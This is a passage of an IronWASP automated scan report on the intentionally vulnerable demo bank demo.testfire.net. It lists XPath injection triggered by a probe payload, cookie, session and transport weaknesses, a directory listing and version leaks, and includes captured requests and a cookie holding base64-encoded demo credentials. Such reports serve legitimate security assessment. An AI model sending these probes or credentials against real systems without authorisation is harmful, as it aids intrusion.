Affected Url:/bank/queryxpath.aspx?__VIEWSTATE=%2fwEPDwUKMTEzMDczNTAxOWRk&__EVENTVALIDATION=%2fwEWAwLNx%2b2YBwKw59eKCgKcjoPABw%3d%3d&_ctl0%3a_ctl0%3aContent%3aMain%3aTextBox1=Enter+title+(e.g.+IBM)&_ctl0%3a_ctl0%3aContent%3aMain%3aButton1=Query
Affected Parameter:_ctl0:_ctl0:Content:Main:TextBox1
Parameter Location:Query
Description:
XPATH Injection was identified in the _ctl0:_ctl0:Content:Main:TextBox1 parameter of the Query section of the scanned request.

XPATH Injection is an issue where it is possible to execute XPATH queries on the XML file being referenced on the server-side. For more details on this issue refer to https://www.owasp.org/index.php/XPATH_Injection

Reasons:
IronWASP has reported this issue because of the following reason:
Reason:
IronWASP sent <!--'"a as payload to the application. This payload would cause an exception to happen in insecure XPATH queries. The response from the application for this payload had the error messages:
XPathException
MS.Internal.Xml.
These error messages are usually found in XPATH query related exceptions. Therefore this issue has been reported.
False Positive Check Assistance:
Manually analyze the response received for the payload and confirm if the error message is actually because of some exception on the server-side. Resend the same payload but without the single or double quote and check if the error message disappears.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request is meant to trigger XPATH errors. The payload is: <!--'"a

GET http://demo.testfire.net/bank/queryxpath.aspx?__VIEWSTATE=%2fwEPDwUKMTEzMDczNTAxOWRk&__EVENTVALIDATION=%2fwEWAwLNx%2b2YBwKw59eKCgKcjoPABw%3d%3d&_ctl0%3a_ctl0%3aContent%3aMain%3aTextBox1=%3c!--'%22a&_ctl0%3a_ctl0%3aContent%3aMain%3aButton1=Query HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response contains XPATH error messages due to the error triggered by the payload

HTTP/1.1 500 Internal Server Error
Connection: close
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 8430

[---- Snipped parts of HTTP body section for brevity ----]Content_lblSummary">This is an unclosed string. </span></b></p>

<h2>Error Message:</h2>

<p><span id="_ctl0_Content_lblDetails">System.Xml.XPath.XPathException: This is an unclosed string.
at MS.Internal.Xml.XPath.XPathScanner.ScanString()
at MS.Internal.Xml.XPath.XPathScanner.NextLex()
at MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseFilterExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParsePathExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnionExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnaryExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseMultiplicativeExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAdditiveExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseRelationalExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseEqualityExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAndExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseOrExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseMethod(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseFilterExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParsePathExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnionExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnaryExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseMultiplicativeExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAdditiveExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseRelationalExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseEqualityExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAndExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseOrExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParsePredicate(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseRelativeLocationPath(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseLocationPath(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParsePathExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnionExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnaryExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseMultiplicativeExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAdditiveExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseRelationalExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseEqualityExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAndExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseOrExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseMethod(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseFilterExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParsePathExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnionExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseUnaryExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseMultiplicativeExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAdditiveExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseRelationalExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseEqualityExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseAndExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseOrExpr(AstNode qyInput)
at MS.Internal.Xml.XPath.XPathParser.ParseXPathExpresion(String xpathExpresion)
at MS.Internal.Xml.XPath.QueryBuilder.Build(String query, Boolean allowVar, Boolean allowKey)
at MS.Internal.Xml.XPath.QueryBuilder.Build(String query, Boolean&amp; needContext)
at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver n[---- Snipped parts of HTTP body section for brevity ----]
Charset Not Set By Server
Type:Vulnerability
Severity:Medium
Confidence:Medium
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/admin/
Affected Parameter:
Parameter Location:URL
Description:
The Charset of the response content is not explicitly set by the server. Lack of charset can cause the browser to guess the encoding type and this could lead to Cross-site Scripting by encoding the payload in encoding types like UTF-7.
The relevant parts of the requests/responses pairs associated with the check that discovered this issue are available below.
Information about the Response from the Server:

This response does not have an explicit declaration for what character encoding is used in it.

Cross-site Cookie Setting
Type:Vulnerability
Severity:Medium
Confidence:Medium
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/bank/customize.aspx?lang=international
Affected Parameter:lang
Parameter Location:Query
Description:
Cross-site Cookie Setting was identified in the lang parameter of the Query section of the scanned request. The value of this parameter is returned in the Set-Cookie header.
The relevant parts of the requests/responses pairs associated with the check that discovered this issue are available below.
Request sent by Scanner:

The payload in this request is a random string sent just to check where this value is reflected back in the response.

GET http://demo.testfire.net/bank/customize.aspx?lang=www40wwwwww HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

The random string from the payload has been found in the Set-Cookie header of this response

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:43:24 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=www40wwwwww; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5881

[---- Snipped parts of HTTP body section for brevity ----]">


<div class="fl" style="width: 99%;">

<h1>Customize Site Language</h1>

<form name="aspnetForm" method="post" action="customize.aspx?lang=www40wwwwww" id="aspnetForm">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Con[---- Snipped parts of HTTP body section for brevity ----][---- Snipped parts of HTTP body section for brevity ----]MjA2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">www40wwwwww</span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
Cookie amSessionId missing the HttpOnly flag
Type:Vulnerability
Severity:Medium
Confidence:High
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/
Description:
The HttpOnly flag was missing on the cookie: amSessionId. This may allow an attacker to get the cookie information using XSS attacks.
Analyzed Response:

The value of the cookie is not protected by the HttpOnly flag and hence becomes accessible from JavaScript

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 20:31:03 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: amSessionId=15313501853; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 9953


Sensitive Form loaded and submitted Insecurely
Type:Vulnerability
Severity:Medium
Confidence:High
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Description:
A form with sensitive contents, including password fields, is loaded and submitted over HTTP
Analyzed Request:

This Request was made over HTTP

GET http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Referer: http://demo.testfire.net/default.aspx?content=inside_contact.htm
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=ugzk5l45izkxuvmpui4xlt55; amSessionId=15313501853



Interesting part of Analyzed Response:

The HTML form containing password fields is displayed below. The unnecessary elements from this form have been stripped away for clarity.

IronWASP is not able to automatically highlight the interesting section of the Response; you would have to identify it manually.
IronWASP's Passive Analyzer reported the following text as being of interest in this case:

----- START OF INTERESTING TEXT -----
<form action="login.aspx" method="post" name="login" id="login" onsubmit="return (confirminput(login));"><input type="text" id="uid" name="uid" value="" style="width: 150px;"><input type="password" id="passw" name="passw" style="width: 150px;"><input type="submit" name="btnSubmit" value="Login"></form>
----- END OF INTERESTING TEXT -----

Session Fixation Found
Type:Vulnerability
Severity:Medium
Confidence:Low
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Description:
The application does not set a new Session ID in the cookie after what appears to be an authentication attempt by the user. If this was a successful login and the Session IDs are stored in cookies then this application is affected by a Session Fixation vulnerability.
Cookie amUserInfo missing the HttpOnly flag
Type:Vulnerability
Severity:Medium
Confidence:High
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Description:
The HttpOnly flag was missing on the cookie: amUserInfo. This may allow an attacker to get the cookie information using XSS attacks.
Analyzed Response:

The value of the cookie is not protected by the HttpOnly flag and hence becomes accessible from JavaScript

HTTP/1.1 302 Found
Date: Mon, 16 Sep 2013 20:31:29 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: amUserInfo=UserName=YWRtaW4=&Password=YWRtaW4=; expires=Mon, 16-Sep-2013 23:31:29 GMT; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 136


Cookie amUserId missing the HttpOnly flag
Type:Vulnerability
Severity:Medium
Confidence:High
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Description:
The HttpOnly flag was missing on the cookie: amUserId. This may allow an attacker to get the cookie information using XSS attacks.
Analyzed Response:

The value of the cookie is not protected by the HttpOnly flag and hence becomes accessible from JavaScript

HTTP/1.1 302 Found
Date: Mon, 16 Sep 2013 20:31:29 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: amUserId=1; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 136


Cookie lang missing the HttpOnly flag
Type:Vulnerability
Severity:Medium
Confidence:High
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/customize.aspx
Description:
The HttpOnly flag was missing on the cookie: lang. This may allow an attacker to get the cookie information using XSS attacks.
Analyzed Response:

The value of the cookie is not protected by the HttpOnly flag and hence becomes accessible from JavaScript

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 20:31:36 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: lang=; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 6056


Directory Listing at : /bank/
Type:Vulnerability
Severity:Medium
Confidence:Medium
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/
Description:
A directory listing vulnerability was found at /bank/
A directory listing provides an attacker with the complete index of all the resources located inside of the directory. The specific risks and consequences vary depending on which files are listed and accessible.
References:
CWE-548: Information Exposure Through Directory Listing
Analyzed Response:

Text found in this response body indicates that there is Directory Listing on the server

HTTP/1.1 200 OK
Content-Length: 2364
[---- Snipped parts of HTTP headers section for brevity ----]
Date: Mon, 16 Sep 2013 20:31:40 GMT

[---- Snipped parts of HTTP body section for brevity ----] content="text/html; charset=UTF-8"><title>demo.testfire.net - /bank/</title></head><body><H1>demo.testfire.net - /bank/</H1><hr>

<pre><A HREF="/">[To Parent Directory]</A><br><br> 5/31/2007 12:10 PM &lt;dir&gt; <A HREF="/bank/20060308_bak/">20060308_bak</A><br> 1/12/2011 11:14 PM 1831 <A HREF="/bank/a[---- Snipped parts of HTTP body section for brevity ----]
Server leaks version number
Type:Vulnerability
Severity:Low
Confidence:High
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/
Description:
The Web Server's banner contains the version number of the server - Microsoft-IIS/6.0. The version number found is 6.0
Analyzed Response:

The Server header of this Response indicates the server version as 6.0

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 20:31:03 GMT
Server: Microsoft-IIS/6.0
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 9953


AutoComplete Enabled on Password Fields
Type:Vulnerability
Severity:Low
Confidence:High
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Description:
The AutoComplete feature has not been disabled on the form fields that accept passwords from users
Information about the Analyzed Response:

This response contains INPUT elements whose type attribute is password but their autocomplete attribute is not set to 'off'

DOM XSS Sources found
Type:Test Lead
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/default.aspx?content=inside_contact.htm
Description:
DOM XSS Sources were found in the Body of the Response. Analyze the Response for the presence of DOM XSS
Sources:
open
.open(
Analyzed Response:

2 DOM XSS Sources and 0 DOM XSS Sinks were found in the JavaScript contained in this response body

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 20:31:17 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 10815

[---- Snipped parts of HTTP body section for brevity ----]ost efficient method of contact.
If you are requesting a change to your account, please call the phone number listed below.</p>

<h2>Phone</h2>
<p>To open a new account, please call:<br />
1.888.245.5550<br />
8:00 a.m. - 6:00 p.m., Eastern Time, Monday - Friday</p>

<p>For assistance with your account,[---- Snipped parts of HTTP body section for brevity ----][---- Snipped parts of HTTP body section for brevity ----]8 or later, Netscape Communicator 4.7 or later, and Microsoft Internet Explorer 4.5 or later.</li>
</ul>
<p>Go to <a title="Netscape" onclick="window.open('disclaimer.htm?url=http://www.netscape.com', '_blank', 'status=no,location=no,menubar=no,resizable=no,scrollbars=no,toolbar=no,width=450,height=200'[---- Snipped parts of HTTP body section for brevity ----][---- Snipped parts of HTTP body section for brevity ----]0,height=200'); return false;" href="disclaimer.htm?url=http://www.netscape.com" target="_blank">Netscape</a> or <a title="Microsoft" onclick="window.open('disclaimer.htm?url=http://www.microsoft.com', '_blank', 'status=no,location=no,menubar=no,resizable=no,scrollbars=no,toolbar=no,width=450,height=200[---- Snipped parts of HTTP body section for brevity ----]
Cookie amUserInfo may contain sensitive information
Type:Test Lead
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Description:
The cookie: amUserInfo might contain sensitive information which could be easily accessed or modified to exploit the web application.
Analyzed Response:

The cookie name or value indicates that it could hold important information

HTTP/1.1 302 Found
Date: Mon, 16 Sep 2013 20:31:29 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: amUserInfo=UserName=YWRtaW4=&Password=YWRtaW4=; expires=Mon, 16-Sep-2013 23:31:29 GMT; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 136


Cookie amUserId may contain sensitive information
Type:Test Lead
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Description:
The cookie: amUserId might contain sensitive information which could be easily accessed or modified to exploit the web application.
Analyzed Response:

The cookie name or value indicates that it could hold important information

HTTP/1.1 302 Found
Date: Mon, 16 Sep 2013 20:31:29 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Set-Cookie: amUserId=1; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 136


Runs on Microsoft-IIS/6.0
Type:Information
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/
Description:
The Web Server returned this banner in its response headers - Microsoft-IIS/6.0
Analyzed Response:

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 20:31:03 GMT
Server: Microsoft-IIS/6.0
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 9953


Technologies identified on Server
Type:Information
Found By:Passive Analysis

Affected Site:http://demo.testfire.net/
Affected Url:/images/pf_lock.gif
Description:
The server makes use of the following technologies:
- ASP.NET
Analyzed Response:

HTTP/1.1 200 OK
Content-Length: 76
[---- Snipped parts of HTTP headers section for brevity ----]
X-Powered-By: ASP.NET
Date: Mon, 16 Sep 2013 20:31:04 GMT


http://html5security.org/
Server leaks version number
Type:Vulnerability
Severity:Low
Confidence:High
Found By:Passive Analysis

Affected Site:http://html5security.org/
Affected Url:/
Description:
The Web Server's banner contains the version number of the server - Microsoft-IIS/7.0. The version number found is 7.0
Analyzed Response:

The Server header of this Response indicates the server version as 7.0

HTTP/1.1 200 OK
Content-Type: text/html
[---- Snipped parts of HTTP headers section for brevity ----]
Server: Microsoft-IIS/7.0
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 16744


Runs on Microsoft-IIS/7.0
Type:Information
Found By:Passive Analysis

Affected Site:http://html5security.org/
Affected Url:/
Description:
The Web Server returned this banner in its response headers - Microsoft-IIS/7.0
Analyzed Response:

HTTP/1.1 200 OK
Content-Type: text/html
[---- Snipped parts of HTTP headers section for brevity ----]
Server: Microsoft-IIS/7.0
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 16744


Technologies identified on Server
Type:Information
Found By:Passive Analysis

Affected Site:http://html5security.org/
Affected Url:/
Description:
The server makes use of the following technologies:
- ASP.NET
Analyzed Response:

HTTP/1.1 200 OK
Content-Type: text/html
[---- Snipped parts of HTTP headers section for brevity ----]
X-Powered-By: ASP.NET
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 16744


http://ironwasp.org/
Server leaks version number
Type:Vulnerability
Severity:Low
Confidence:High
Found By:Passive Analysis

Affected Site:http://ironwasp.org/
Affected Url:/
Description:
The Web Server's banner contains the version number of the server - Microsoft-IIS/7.0. The version number found is 7.0
Analyzed Response:

The Server header of this Response indicates the server version as 7.0

HTTP/1.1 200 OK
Content-Type: text/html
[---- Snipped parts of HTTP headers section for brevity ----]
Server: Microsoft-IIS/7.0
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 2766


Runs on Microsoft-IIS/7.0
Type:Information
Found By:Passive Analysis

Affected Site:http://ironwasp.org/
Affected Url:/
Description:
The Web Server returned this banner in its response headers - Microsoft-IIS/7.0
Analyzed Response:

HTTP/1.1 200 OK
Content-Type: text/html
[---- Snipped parts of HTTP headers section for brevity ----]
Server: Microsoft-IIS/7.0
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 2766


Technologies identified on Server
Type:Information
Found By:Passive Analysis

Affected Site:http://ironwasp.org/
Affected Url:/
Description:
The server makes use of the following technologies:
- ASP.NET
Analyzed Response:

HTTP/1.1 200 OK
Content-Type: text/html
[---- Snipped parts of HTTP headers section for brevity ----]
X-Powered-By: ASP.NET
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 2766